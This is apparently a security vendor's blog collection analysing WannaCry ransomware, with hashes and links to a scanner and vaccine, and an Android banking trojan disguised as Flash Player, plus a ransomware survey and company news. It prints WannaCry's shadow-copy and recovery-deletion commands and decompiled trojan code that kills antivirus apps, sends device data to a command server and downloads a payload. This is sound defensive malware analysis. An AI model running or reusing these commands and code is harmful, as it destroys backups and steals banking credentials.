WannaCry Ransomware Scanner and Vaccine Toolkit

Trustlook has released a scanner and vaccine toolkit to help system administrators protect Windows computers that are either vulnerable to or have been infected with the dangerous strain of ransomware known as WannaCry. The toolkit can be found on GitHub.

Banks, telephone companies and hospitals have all been ensnared in this worldwide hack, with the malware locking down computers while demanding a hefty sum for freedom. The attack has hit more than 230,000 computers in 150 countries including China, Russia, Spain, Italy and Vietnam, with hospitals in the UK attracting the most attention because real lives have been put at risk while their devices are locked down.  Ransom payments have been demanded in the cryptocurrency bitcoin in 28 languages.

Trustlook Labs has tracked the global wave of WannaCry attacks. The malware exploits the vulnerability identified CVE-2017-0145 (Windows SMB Remote Code Execution vulnerability) to spread itself. The malware uses the publicly available “Eternal Blue exploit” by the hacker group “The Shadow Brokers.” The vulnerability exists in unpatched versions of newer Windows operating system, as well as unsupported versions of Windows XP, 2003 and 8.

The following images are a tracker map and the number of unique IP addresses infected over the last 24 hours.

image1

image8

The WannaCry malware comes as a dropper with two components:

  1. A component utilizes the SMB Remote code vulnerability to spread the other files throughout the network and execute the ransomware component.
  2. After the ransomware component is executed, it extracts the following files from the resource section named “XIA”:
b.wnry: a Bmp file used to display the ransome message
t.wnry:  encrypted file with “WANACRY!” header, decrypted to a DLL module which is the main payload.
c.wnry: configuration file. Contains several Tor server address and link for Tor browser.
s.wnry: ZIP component file
r.wnry: ransomware Q&A
u.wnry: decryptor executable
taskdl.exe: executable used to delete file
taskse.exe: application to start a remote session
msg/m_.wnry: localized language files

If the malware starts with parameter “/i”, it copies itself into:

“C:\ProgramData\<random characters>\tasksche.exe” and creates service “<random characters>”, the service’s BinaryPathName “cmd.exe /c “C:\ProgramData\<random characters>\tasksche.exe”

The malware creates a mutex to make sure only one instance is running in the system. In this version of the malware (2.0) the mutex is:

“Global\\MsWinZonesCacheCounterMutexA0”. Another version of malware (1.) uses mutex “Global\\WINDOWS_TASKCST_MUTEX”.

The malware runs “icacls . /grant Everyone:F /T /C /Q” to grant access to all users on the system.

The malware then decrypts the payload DLL module into memory and calls the export function “TaskStart”. The malware generates a 2048 bit RSA key by calling the “CryptGenKey” function.

The malware then exports a public key and a private key. The public key is saved as “000000000.pky”. The private key is then encrypted by using another public key, which exists in the binary and is saved as “00000000.eky”. The related private key is held by the malware writer. The malware emulates the system and searches for the file with the following extensions:

.123, .jpeg , .rb , .602 , .jpg , .rtf , .doc , .js , .sch , .3dm , .jsp , .sh , .3ds , .key , .sldm , .3g2 , .lay , .sldm , .3gp , .lay6 , .sldx , .7z , .ldf , .slk , .accdb , .m3u , .sln , .aes , .m4u , .snt , .ai , .max , .sql , .ARC , .mdb , .sqlite3 , .asc , .mdf , .sqlitedb , .asf , .mid , .stc , .asm , .mkv , .std , .asp , .mml , .sti , .avi , .mov , .stw , .backup , .mp3 , .suo , .bak , .mp4 , .svg , .bat , .mpeg , .swf , .bmp , .mpg , .sxc , .brd , .msg , .sxd , .bz2 , .myd , .sxi , .c , .myi , .sxm , .cgm , .nef , .sxw , .class , .odb , .tar , .cmd , .odg , .tbk , .cpp , .odp , .tgz , .crt , .ods , .tif , .cs , .odt , .tiff , .csr , .onetoc2 , .txt , .csv , .ost , .uop , .db , .otg , .uot , .dbf , .otp , .vb , .dch , .ots , .vbs , .der” , .ott , .vcd , .dif , .p12 , .vdi , .dip , .PAQ , .vmdk , .djvu , .pas , .vmx , .docb , .pdf , .vob , .docm , .pem , .vsd , .docx , .pfx , .vsdx , .dot , .php , .wav , .dotm , .pl , .wb2 , .dotx , .png , .wk1 , .dwg , .pot , .wks , .edb , .potm , .wma , .eml , .potx , .wmv , .fla , .ppam , .xlc , .flv , .pps , .xlm , .frm , .ppsm , .xls , .gif , .ppsx , .xlsb , .gpg , .ppt , .xlsm , .gz , .pptm , .xlsx , .h , .pptx , .xlt , .hwp , .ps1 , .xltm , .ibd , .psd , .xltx , .iso , .pst , .xlw , .jar , .rar , .zip , .java , .raw.

Once the file is found, the malware call “CryptGenRandom” to create a random key, then uses the aforementioned generated public key to encrypt it. This key is used to encrypt the file, and the key itself is written into the file. A header string “WANACRY!” is written into the file as a flag to make sure the file is encrypted. The encrypted file is appended with a “.WNCRYT” file extension.

The malware runs the following commands to delete the system shadow copies:

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog –quiet

The malware then displays the following ransom note:

image9

The user can select a different language:

image5

The malware runs a decryptor application to check if the user has paid the ransom. If so, the “.eky” file is sent to the server and decrypts the files by using the private key held by the writer. The decrypted key is then used to decrypt the file.

Trustlook WannaCry Scanner Tool

Trustlook has released a Wannacry Scanner to help system admin scan their network for vulnerable windows systems.

image4

WannaCry Scanner Download Link
https://github.com/apkjet/TrustlookWannaCryToolkit/tree/master/scanner

Here is an screen capture of the tool:

image3

Trustlook Wannacry Ransomware Vaccine Tool

Trustlook’s WannaCry Ransomware Vaccine tool does not require a system reboot. Just run this tool or add it to your windows startup script to help you block the ransomware attack. 

image7

Screenshot for WannaCry Ransomware Vaccine Tool (Vaccine for both version 1 and version 2)

image3a

Trustlook WannaCry Ransomware vaccine tool download link:
https://github.com/apkjet/TrustlookWannaCryToolkit/tree/master/vaccine

WannaCry Ransomware Samples

As of this writing, Trustlook has collected 49 different WannaCry samples. Each sample has been tested by Trustlook, and each has been detected and safely vaccinated.

Below are the SHA256 hashes related to this ransomware:

dff26a9a44baa3ce109b8df41ae0a301d9e4a28ad7bd7721bbb7ccd137bfd696
00fdb4c1c49aef198f37b8061eb585b8f9a4d5e6c62251441831fe2f6a0a25b7
043e0d0d8b8cda56851f5b853f244f677bd1fd50f869075ef7ba1110771f70c2
09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa
11011a590796f6c52b046262f2f60694310fa71441363d9116ada7248e58509a
11d0f63c06263f50b972287b4bbd1abe0089bc993f73d75768b6b41e3d6f6d49
16493ecc4c4bc5746acbe96bd8af001f733114070d694db76ea7b5a0de7ad0ab
190d9c3e071a38cb26211bfffeb6c4bb88bd74c6bf99db9bb1f084c6a7e1df4e
201f42080e1c989774d05d5b127a8cd4b4781f1956b78df7c01112436c89b2c9
22ccdf145e5792a22ad6349aba37d960db77af7e0b6cae826d228b8246705092
24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd
2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
3f3a9dde96ec4107f67b0559b4e95f5f1bca1ec6cb204bfe5fea0230845e8301
4186675cb6706f9d51167fb0f14cd3f8fcfb0065093f62b10a15f7d9a6c8d982
4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
4b76e54de0243274f97430b26624c44694fbde3289ed81a160e0754ab9f56f32
4c69f22dfd92b54fbc27f27948af15958adfbc607d68d6ed0faca394c424ccee
57c12d8573d2f3883a8a0ba14e3eec02ac1c61dee6b675b6c0d16e221c3777f4
5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec
5b4322ec672fdfeb292941057125d00afcf1a904e31f9ec0fb9e650177dba500
5d26835be2cf4f08f2beeff301c06d05035d0a9ec3afacc71dff22813595c0b9
6747b820d785398d6fca544b100af624af4c3c6339a69d7ffaf4c2af8301654d
78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df
7c465ea7bcccf4f94147add808f24629644be11c0ba4823f16e8c19e0090f0ff
80457fd3c283b3da95ee8e9cb62c28c51a05ca6b1b03f84c3737de2d951d17cd
8321dfdf54fa41c6ef19abe98df0f5ef80387790e8df000f6fd6dc71ea566c07
940dec2039c7fca4a08d08601971836916c6ad5193be07a88506ba58e06d4b4d
9b60c622546dc45cca64df935b71c26dcf4886d6fa811944dbc4e23db9335640
9fb39f162c1e1eb55fbf38e670d5e329d84542d3dfcdc341a99f5d07c4b50977
a141e45c3b121aa084f23ebbff980c4b96ae8db2a8d6fde459781aa6d8a5e99a
a3900daf137c81ca37a4bf10e9857526d3978be085be265393f98cb075795740
a50d6db532a658ebbebe4c13624bc7bdada0dbf4b0f279e0c151992f7271c726
aee20f9188a5c3954623583c6b0e6623ec90d5cd3fdec4e1001646e27664002c
b13c1c0dfd66807f6e703e744f6bb5a60b9cbde8bf32403a74edce14f52af305
b47e281bfbeeb0758f8c625bed5c5a0d27ee8e0065ceeadd76b0010d226206f0
b66db13d17ae8bcaf586180e3dcd1e2e0a084b6bc987ac829bbff18c3be7f8b4
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
c1f929afa37253d28074e8fdaf62f0e3447ca3ed9b51203f676c1244b5b86955
c365ddaa345cfcaff3d629505572a484cff5221933d68e4a52130b8bb7badaf9
ca29de1dc8817868c93e54b09f557fe14e40083c0955294df5bd91f52ba469c8
d8a9879a99ac7b12e63e6bcae7f965fbf1b63d892a8649ab1d6b08ce711f7127
dceef54e6670388c81b5a8b8583d5e7c5245ce4dd40a83439afeb4f14693367d
e14f1a655d54254d06d51cd23a2fa57b6ffdf371cf6b828ee483b1b1d6d21079
e8450dd6f908b23c9cbd6011fe3d940b24c0420a208d6924e2d920f92c894a96
eb72085fd9b3cf136f84d69643c31a48d1e03dda550268885891d26bf09b469c
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
f8812f1deb8001f3b7672b6fc85640ecb123bc2304b563728e6235ccbe782d85
fc626fe1e0f4d77b34851a8c60cdd11172472da3b9325bfe288ac8342f6c710a

List of WannaCry ransomware files used in widespread attacks

Ransomware is the number one cybersecurity threat facing consumers and business worldwide. (Trustlook posted research last month on just how big of a problem for consumers ransomware is becoming.)

Today’s WannaCry outbreak is just more evidence of the severe threat posed by ransomware. Banks, telephone companies and hospitals have all been ensnared in the worldwide hack, with the malware locking down computers while demanding a hefty sum for freedom.

The attack has hit close to 100,000 computers across China, Russia, Spain, Italy and Vietnam, but the UK hospitals have attracted the most attention because real lives at risk while their devices are locked down.

The malware used in the attacks encrypts the files and also drops and executes a decryptor tool. The request for $600 in Bitcoin is displayed along with the wallet. It’s interesting that the initial request in this sample is for $600 USD, as the first five payments to that wallet is approximately $300 USD. It suggests that the group is increasing the ransom demands.

wannacry_05

Trustlook has identified the following files used in the WannaCry ransomware attack. Analysis is ongoing, and we will update this blog with more information.

SHA256

09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa

24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c

2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd

2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79

B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25

d8a9879a99ac7b12e63e6bcae7f965fbf1b63d892a8649ab1d6b08ce711f7127

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

f8812f1deb8001f3b7672b6fc85640ecb123bc2304b563728e6235ccbe782d85

 

MD5

4fef5e34143e646dbf9907c4374276f5

5bef35496fcbdbe841c82f4d1ab8b7c2

775a0631fb8229b2aa3d7621427085ad

7bf2b57f2a205768755c07f238fb32cc

7f7ccaa16fb15eb1c7399d422f8363e8

8495400f199ac77853c53b5a3f278f3e

84c82835a5d21bbcf75a61706d8ab549

86721e64ffbd69aa6944b9672bcabb6d

8dd63adb68ef053e044a5a2f46e0d2cd

b0ad5902366f860f85b892867e5b1e87

d6114ba5f10ad67a4131ab72531f02da

db349b97c37d22f5ea1d1841e3c89eb4

e372d07207b4da75b3434584cd9f3450

f529f4556a5126bba499c26d67892240

38% of Consumers Affected by Ransomware Pay Up

New study reveals shocking statistics on ransomware

If you think ransomware is a problem that impacts only deep-pocketed big businesses like hospitals or banks, new research by cybersecurity firm Trustlook might make you think differently. In its latest research, Trustlook found that consumers are increasingly being targeted with ransomware—and, perhaps surprisingly, many of them are paying up.

Ransomware is malicious software that locks all files on a targeted computer or network until the owner pays the ransom. While it’s true that hackers may have more to gain from large organizations, experts say they see consumers, with their lack of sophistication in security, as lower-hanging fruit. Because consumers usually have fewer information security resources than large organizations, breaches are far easier to achieve and are more likely to have a meaningful impact, and thus are more likely to result in a payment.

Most users are completely unaware of the threat posed by ransomware attacks and are not prepared to handle them. Trustlook’s research shows that this lack of awareness and apathy is resulting in insufficient action taken to protect devices and data. 48% of consumers are not worried about becoming a victim of a ransomware attack, and only 7% of non-impacted consumers say they would pay the ransom if they were hacked. Other findings include:

  • 17% of consumers have been infected with ransomware
  • 38% of affected consumers paid the ransom
  • $100-$500 was the dollar range of ransomware payouts by consumers
  • 45% of consumers have not heard of ransomware
  • 23% of consumers do not backup the files on their computer or mobile device

Since the beginning of 2016, ransomware has gone from a relatively exclusive category of malware utility to a mainstream destructive tool used in wave after wave of phishing attacks against individuals and companies alike. Ransomware is now so widespread that it cost businesses a total of $1 billion in 2016, according to a new report. Moreover, ransomware has been identified by the U.S. Department of Justice as the “biggest cyberthreat” of 2017.

Ransomware is delivered primarily via a phishing email, which means consumers and employees, who are the last lines of defense in any security stack, must be trained to identify it in order to prevent it. This has made traditional security measures, such as antivirus tools, less effective.

In addition, the rise of crypto currencies such as Bitcoin have had a dramatic impact on the number and type of cybercrime opportunities. These tools have become the engine of cybercrime by making it safe and easy to transfer money anonymously.

Trustlook has the following advice for consumers who are worried that they might become a victim of ransomware. “Backup your data to multiple devices, and to at least one device that is not connected to a network,” says Allan Zhang, co-founder and CEO of Trustlook. “Also, be cautious of emails by checking the sender’s email address before clicking any link.”

To see an infographic of Trustlook’s ransomware research findings, please click here. For more information on SECUREai, Trustlook’s artificial intelligence security engine that detects ransomware, please visit http://www.trustlook.com.

Trojan Steals Account Information from European Banking Apps

A banking trojan discovered by Trustlook labs targets European banks and can steal users’ banking credentials. To make matters worse, the trojan is also capable of blocking most anti-virus apps.

The trojan disguises itself as an Adobe Flash Player app on Google Play. The malware hides string constants, keeps them encoded, and only decodes them before they are used.

The package can be identified as having the following characteristics:

  • MD5: b3a83ea6252bc7a4303774c1cd2c3b6f
  • SHA256: 784c835761e0223a46195fccbffae9fc0e19725ee989fe08e9d9fe119f7d4056
  • Size: 395595
  • App name: AdobeFlashPlayer
  • Package name: update.Adobe.Flash.Player

The package icon is:

apicon

The malware hides critical strings in order to prevent identification. It uses an exclusive or (XOR) operation to obfuscate the strings.

One of the encoding functions is shown below. The malware uses 7 similar functions to encode the string:

  public static String a(String paramString)
  {
    int i = paramString.length();
    char[] arrayOfChar = new char[i];
    int j = i - 1;
    for (i = j; j >= 0; i = j)
    {
      j = paramString.charAt(i);
      int k = i - 1;
      arrayOfChar[i] = ((char)(j ^ 0x52));
      if (k < 0) {
        break;
      }
      j = k - 1;
      arrayOfChar[k] = ((char)(paramString.charAt(k) ^ 0x7D));
    }
    return new String(arrayOfChar);
  }

After encoding, the string becomes unreadable. Upon execution of the malware, the app attempts to terminate any anti-virus apps. The decoded strings are listed in the comments added by Trustlook :

    void a() {
        int v0;
        int v10 = 22;
        int v9 = -1;
        if(Build$VERSION.SDK_INT <= v10) {
            v0 = 0;
            int v3;
            for(v3 = 0; v0 > v9; v3 = v0) {
                String v5 = this.b();
                String[] v6 = new String[31];
                v6[0] = a.a("\u000E\u0001\u0000@\u0006\u000B\b\u001C\u000F\u0017C\u000F\t\u000F\u001A\u000F\u001F\u000B"); // com.keerby.adaware
                v6[1] = b.a("Y\u0004WE[\u0003T\u0007[\t\u0014\u001D\t\u0006U\tS\u0007_\u0018_\bO\u0019S\u001FC");//com.ahnlab.v3mobilesecurity
                v6[2] = a.a("\u000E\u0001\u0000@\f\u0018\f\u001D\u0019@\f\u0000\t\u001C\u0002\u0007\t@\u0000\u0001\u000F\u0007\u0001\u000B\u001E\u000B\u000E\u001B\u001F\u0007\u0019\u0017");//com.avast.android.mobilesecurity
                v6[3] = b.a("Y\u0004WE[\u0005N\u0002L\u0002H\u001EI");//com.antivirus
                v6[4] = a.a("\r\u0002\u0003C\u000F\u001B\u0007\u001F\u000FC\u000F\u0003\n\u001F\u0001\u0004\n");//com.avira.android
                v6[5] = b.a("Y\u0004WEX\u0002N\u000F_\r_\u0005^\u000EHE[\u0005N\u0002L\u0002H\u001EI");//com.bitdefender.antivirus
                v6[6] = a.a("\r\u0002\u0003C\f\u0018\u0002\u0001\t\u0018\u000F\u001F\nC\u0003\u0002\f\u0004\u0002\b@\u0000\u0001\u000F\u0007\u0001\u000B\u001E\u000B\u000E\u001B\u001F\u0007\u0019\u0017");//com.bullguard.mobile.mobilesecurity
                v6[7] = b.a("\bU\u0006\u0014\bU\u0006U\u000FUEY\u0002I\u0006_E[\u0005N\u0002L\u0002H\u001EI");//com.comodo.cisme.antivirus
[]
    public String b() {
        String v0;
        if(Build$VERSION.SDK_INT <= 19) {
            List v1 = this.getSystemService(b.a("\nY\u001FS\u001DS\u001FC")).getRunningTasks(1);//activity
            v1.get(0);
            v0 = v1.get(0).topActivity.getPackageName();
        }
        else {
            v0 = this.getSystemService(a.a("\f\r\u0019\u0007\u001B\u0007\u0019\u0017")).getRunningAppProcesses().get(0).processName;
        }//activity

        return v0;
    }

    protected void onHandleIntent(Intent arg1) {
        this.a();
    }

The following is a list of the security apps whose processes are terminated by the malware:

  • keerby.adaware
  • ahnlab.v3mobilesecurity
  • avast.android.mobilesecurity
  • antivirus
  • avira.android
  • bitdefender.antivirus
  • bullguard.mobile.mobilesecurity
  • comodo.cisme.antivirus
  • drweb
  • emsisoft.security
  • eScan.main
  • eset.ems2.gp
  • fsecure.ms.dc
  • fortinet.forticlient
  • gdata.mobilesecurity
  • ikarus.mobile.security
  • k7computing.android.security
  • kms.free
  • malwarebytes.antimalware
  • wsandroid.suite
  • pandasecurity.pandaav
  • quickheal.platform
  • solo.security
  • sophos.smsec
  • antispycell.free
  • symantec.enterprise.mobile.security
  • totaldefense.security
  • trendmicro.tmmspersonal
  • trustport.mobilesecurity
  • ssd.vipre
  • zillya.security

The malware then looks for the banking apps’ processes. If found, the malware sends the information to the C&C server, and receives specific forms from the server to create a fake banking interface that entices users to enter their credentials.

public String a()
  {
    Log.d(i.a("8,'+\"+3.4O=-6"), k.a("%\0357\n5\020V\0327\026=x5\024?\0358\fQ\013")); //INVISIBLE-LOG  SEARCH BANK CLIENT'S
    Object localObject1 = getPackageManager().getInstalledApplications(128).iterator();
    int i11 = 0;
    int i10 = 0;
    int i20 = 0;
    int i19 = 0;
    int i18 = 0;
    int i17 = 0;
    int i9 = 0;
    int i7 = 0;
    int i5 = 0;
    int i3 = 0;
    int i1 = 0;
    int m = 0;
    int i = 0;
    while (((Iterator)localObject1).hasNext())
    {
      localObject2 = (ApplicationInfo)((Iterator)localObject1).next();
      int j = i11;
      if (((ApplicationInfo)localObject2).packageName.equals(i.a("\022\r\034L\020\t\023\003\037\t_\003\037\006\003\r\030\006_\003\001\022\002L\020\t\023\003\037\t.\006\030\020\024\t\005"))) {
        j = 1; //com.akbank.android.apps.akbank_direkt
      }
      if (((ApplicationInfo)localObject2).packageName.equals(k.a(";\0315X>\0376\0276\005:\0276\035v\0337\0241\032=X;\023(\005-\024="))) {
        j = 2; //com.finansbank.mobile.cepsube
      }
      int k = i10;
      if (((ApplicationInfo)localObject2).packageName.equals(i.a(""))) {
        k = 1;
      }
      if (((ApplicationInfo)localObject2).packageName.equals(k.a(";\0315X,\0337\024,\023;\036v\0369\0323\0249\0303"))) {
        k = 2; //com.tmobtech.halkbank
      }
 []

        PowerManager$WakeLock v0_2 = v0_1.getSystemService(k.a("(\u0019/\u0013*")).newWakeLock(1, i.a("\"\u0007\u0003\u0014\u0018\u0001\u0014"));
		//power Service
        if(v0_2 != null) {
            v0_2.acquire();
        }

        e v10 = new e();
        k v11 = new k();
        Object v0_3 = this.getSystemService(k.a("(\u001E7\u0018="));//phone
        String v1 = "";
        if(Build$VERSION.SDK_INT < 23) {
            v3 = ((TelephonyManager)v0_3).getDeviceId();
            v2 = new StringBuilder().insert(0, i.a("Y")).append(((TelephonyManager)v0_3).getNetworkOperatorName()).append(k.a("q")).append(((TelephonyManager)v0_3).getLine1Number()).toString();
            v7 = v3;
        }
        else {
            v1 = Settings$Secure.getString(this.getContentResolver(), i.a("\u0003\u001F\u0006\u0003\r\u0018\u0006.\u000B\u0015"));//android_id
            if(v1 == "") {
                v1 = new StringBuilder().insert(0, k.a("Em")).append(Build.BOARD.length() % 10).append(Build.BRAND.length() % 10).append(Build.CPU_ABI.length() % 10).append(Build.DEVICE.length() % 10).append(Build.DISPLAY.length() % 10).append(Build.HOST.length() % 10).append(Build.ID.length() % 10).append(Build.MANUFACTURER.length() % 10).append(Build.MODEL.length() % 10).append(Build.PRODUCT.length() % 10).append(Build.TAGS.length() % 10).append(Build.TYPE.length() % 10).append(Build.USER.length() % 10).toString();
            }

            v3 = i.a("J?-X");//(NO)
            v7 = v1;
            v1 = k.a("\u0011\u0018\u001F6\u0013<");//Indefined
            v2 = v3;
        }

        String v4 = Build$VERSION.RELEASE;
        String v5 = new StringBuilder().insert(0, Build.MODEL).append(i.a("BY")).append(Build.PRODUCT).append(k.a("q")).toString();
        String v6 = ((TelephonyManager)v0_3).getNetworkCountryIso();
        String v8 = "";
        i.a("A");
        if(!this.getSystemService(k.a("<\u0013.\u001F;\u0013\u0007\u00067\u001A1\u0015!")).isAdminActive(null)) { //device_policy
            v3 = i.a("A");
            v0_1 = this;
        }
        else {
            v3 = k.a("i");
            v0_1 = this;
        }

        boolean v0_4 = v0_1.getSystemService(i.a("\t\u0014\u001B\u0016\u0017\u0010\u0010\u0015")).inKeyguardRestrictedInputMode(); //keyguard
        k.a("h");
        if(v0_4) {
            v0_5 = i.a("A");
            Log.e(k.a("jDj"), i.a("\u001E\u0004\u0017")); //222 off
        }
        else {
            v0_5 = k.a("i");
            Log.e(i.a("CPC"), k.a("\u00196"));
        }

        Log.e(i.a("\u0012\u001E\u0011\u0005"), new StringBuilder().insert(0, k.a("\u0002-\u001D\u0007\u0006e")).append(v11.b(new StringBuilder().insert(0, v7).append(i.a("K")).append(v3).append(k.a("b")).append(v0_5).toString())).toString());
		//post tuk_p=
        v0_5 = v11.c(v10.a(this.a.d + i.a("M\u0010\u0006\u001C\u000B\u001F\u000E\u001E\u0006^\u0005\u0010\u0016\u0014L\u0001\n\u0001"), new StringBuilder().insert(0, k.a("\u0006e")).append(v11.b(new StringBuilder().insert(0, v7).append(i.a("K")).append(v3).append(k.a("b")).append(v0_5).toString())).toString())); ///adminlod/gate.php
        Log.e("", new StringBuilder().insert(0, i.a("QOQ\\Q")).append(v0_5).toString());
        if(v0_5.contains(k.a("\n\u00169$"))) {
            v0_5 = this.a();
            System.out.println("");
            System.out.println(new StringBuilder().insert(0, i.a("\u0002\u0007\u0005=\u0015\u0003\u0005\u0003.\u0012L")).append(v11.b(new StringBuilder().insert(0, " ").append(v7).append(k.a("b")).append(v2).append(v1).append(i.a("K")).append(v4).append(k.a("b")).append(v6).append(i.a("K")).append(v0_5).append(k.a("b")).append(v5).toString())).toString()); // set_data_p=
            v3 = this.a.d + i.a("^\u0003\u0015\u000F\u0018\f\u001D\r\u0015M\u0003\u0007\u0016L\u0001\n\u0001"); ///adminlod/reg.php
            StringBuilder v9 = new StringBuilder().insert(0, k.a("\u0006e"));
            StringBuilder v0_6 = new StringBuilder().insert(0, v7).append(i.a("K")).append(v2).append(v1).append(k.a("b")).append(v4).append(i.a("K")).append(v6).append(k.a("b")).append(v0_5).append(i.a("K")).append(v5).append(k.a("b"));
            this.a.getClass();
            v0_5 = v11.c(v10.a(v3, v9.append(v11.b(v0_6.append("DDD").append(i.a("K")).append(v8).toString())).toString()));

The affected bank apps are:

  • akbank.android.apps.akbank_direkt
  • finansbank.mobile.cepsube
  • garanti.cepsubesi
  • tmobtech.halkbank
  • pozitron.iscep
  • vakifbank.mobile
  • ykb.android
  • ziraat.ziraatmobil
  • whatsapp
  • facebook.orca
  • facebook.katana
  • instagram.android
  • supercell.clashroyale
  • supercell.clashofclans
  • google.android.play.games
  • snapchat.android
  • twitter.android
  • google.android.apps.translate
  • ebay.gumtree.au
  • anz.android
  • bankaustria.android.olb
  • bawag.mbanking
  • easybank.mbanking
  • isis_papyrus.raiffeisen_pay_eyewdg
  • spardat.netbanking
  • volksbank.volksbankmobile
  • commbank.netbank
  • westpac.bank
  • stgeorge.bank
  • com.nab.mobile
  • com.ingdirect.android
  • com.bankwest.mobile
  • banksa.bank
  • paypal.android.p2pmobile
  • grppl.android.shell.CMBlloydsTSB73
  • grppl.android.shell.halifax
  • co.tsb.mobilebank
  • creditagricole.androidapp
  • comarch.mobile
  • bzwbk.bzwbk24
  • bzwbk.bzwbk24
  • eurobank
  • getingroup.mobilebanking
  • ing.ingmobile
  • ing.ingmobile
  • pkobp.iko
  • mbank
  • android.bcpBankingApp.millenniumPL
  • eleader.mobilebanking.pekao
  • eleader.mobilebanking.raiffeisen
  • db.mm.deutschebank
  • commerzbanking.mobil
  • starfinanz.smob.android.sfinanzstatus
  • ing.diba.mbbr2
  • fiducia.smartphone.android.banking.vr
  • santander.de
  • starfinanz.smob.android.sbanking
  • postbank.finanzassistent
  • dkb.portalapp
  • consorsbank
  • comdirect.android
  • creditagricole.android
  • axa.monaxa
  • banquepopulaire.cyberplus
  • bnpparibas.mescomptes
  • boursorama.android.clients
  • caisseepargne.android.mobilebanking
  • cic_prod.bad
  • cm_prod.bad
  • groupama.toujoursla
  • IngDirectAndroid
  • fullsix.android.labanquepostale.accountaccess
  • lcl.android.customerarea
  • macif.mobile.application.android
  • ocito.cdn.activity.creditdunord
  • societegenerale.mobile.lappli

The malware is capable of stealing a user’s contacts , sending an SMS message, opening a web page, updating itself and more. The following code snippets demonstrate how the malware downloads an APK and updates itself:

            if(v9_1[v8_1].contains(i.a("7\u0001\u0006\u0010\u0016\u0014\u0011. \u001E\u0016\u0002"))) {//Updates_Bots
                v2 = v11.a(v9_1[v8_1], k.a("\n6\u00035\u0014=\u0004e"), i.a("\u001E\u0005\u0007\t\u0016L"));//|number= |text=
                v0_9 = v9_1[v8_1].split(k.a(",\u0013 \u0002e")); //text=
                System.out.println(new StringBuilder().insert(0, v2).append(v0_9[1]).toString());
                Log.d("", "");
                v3 = UUID.randomUUID().toString();
                v4 = i.a("L\u0010\u0012\u001A");//.apk
                try {
                    URLConnection v0_12 = new URL(v0_9[1]).openConnection();
                    ((HttpURLConnection)v0_12).setRequestMethod(k.a("\u001F3\f")); //GET
                    ((HttpURLConnection)v0_12).setDoOutput(true);
                    ((HttpURLConnection)v0_12).connect();
                    v1 = Environment.getExternalStorageDirectory() + i.a("M\u0015\r\u0006\f\u001D\r\u0010\u0006^"); ///download/
                    Log.v("", new StringBuilder().insert(0, k.a("&\u0019\"\u0010Lx")).append(v1).toString()); //PATH: 
                    File v5_1 = new File(v1);
                    v5_1.mkdirs();
                    v5_2 = new FileOutputStream(new File(v5_1, new StringBuilder().insert(0, v3).append(v4).toString()));
                    v1_1 = ((HttpURLConnection)v0_12).getInputStream();
                    v6_2 = new byte[4096];
                    v0_13 = v1_1;
                    goto label_524;
                }


Summary
Banking malware that steals users’ log in credentials is becoming an increasing problem. Most of this category of malware, as is highlighted in this post, attempts to stay hidden to prevent analysis and detection. It also uses an obfuscation technique to make textual data unreadable. Using these techniques of hiding strings and masking data is useful for malware writers because it requires much more time for analysis to be done and the malware to be identified.

Thankfully, in this case, Trustlook was able to gather deep insights and knowledge of the malware behavior. Trustlook’s SECUREai anti-threat platform can effectively protect users against this invasion.

Trustlook Responds to Government Repeal of Broadband Privacy Rules

Last month’s proposal by the Trump administration to reverse the privacy regulations put in place by the Obama administration in October 2016 could lead to an increase in phishing attacks, according to cybersecurity company Trustlook.

The FCC rules would have given consumers greater control over what their internet service provider can do with their data by requiring those companies to get permission from customers before using their information to create targeted advertisements.

Under the regulation rollback, there are few limits on the ways ISPs will be allowed to interact with sensitive user data. That includes not just allowing providers to create marketing profiles based on the browsing history of their users, but also letting them deploy undetectable tools that track web traffic, too.

Trustlook CEO Allan Zhang shared this quote with ThreatPost:

“Our bigger concern is once this data is freely sold and traded, it is possible for bad actors to acquire this data and perpetrate personalized phishing attacks,” said Allan Zhang, co-founder and CEO of cybersecurity company Trustlook. He added, because apps such as AppFlash collect personal data legally and malware detectors don’t identify them, consumers will likely be oblivious to how their personal information is being collected and used.

You can read the entire article here.

 

Trustlook is part of the blazing fast Qualcomm Snapdragon 835 chipset

Lynn La from CNET wrote a great story describing the benefits of the new Qualcomm Snapdragon 835 chipset. And low and behold, she also included an image of the Trustlook Mobile Security app (image #16 in the story), which is part of the new Snapdragon chipset. Make sure your next device takes advantage of the speed and security that the new Qualcomm Snapdragon 835 chip offers.

Read about it here.

qualcomm-lab-tour-17